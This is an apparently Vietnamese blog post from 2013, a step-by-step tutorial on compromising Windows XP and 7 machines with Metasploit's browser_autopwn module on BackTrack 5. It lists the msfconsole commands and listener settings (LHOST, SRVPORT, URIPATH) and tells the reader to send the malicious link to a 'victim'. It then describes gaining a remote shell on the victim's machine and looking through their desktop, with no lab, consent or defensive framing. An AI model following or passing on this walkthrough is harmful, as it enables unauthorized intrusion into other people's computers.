Thứ Tư, 2 tháng 1, 2013

Exploit win7-xp dùng browser autopwn với backtrack5

Bước 1:Vào terminal với quyền root
nhập:msfconsole
tiếp tục

use auxiliary/server/browser_autopwn
show options

Xem ip mình bằng ifconfig để sau này connect về 

ip nhận đc là 192.168.187.130

ta tiếp tục cấu hình

set LHOST 192.168.187.130
set SRVPORT 80
set URIPATH /


tiếp tục exploit Ta chờ nó chạy xong thì nhận đc thế này


Gửi cho victim địa chỉ mình đã open
Nếu victim kick vào thì ta nhận đc như sau


nó báo đã migrated thành công,ta kiểm tra thử nào

ta thấy victim dùng winxp bản 32bit,tiếp tục
Ngon ! ta thấy terminal giờ như cmd của win
thao tác thử để xem trên desktop victim có gì nhá

End!

Không có nhận xét nào:

Đăng nhận xét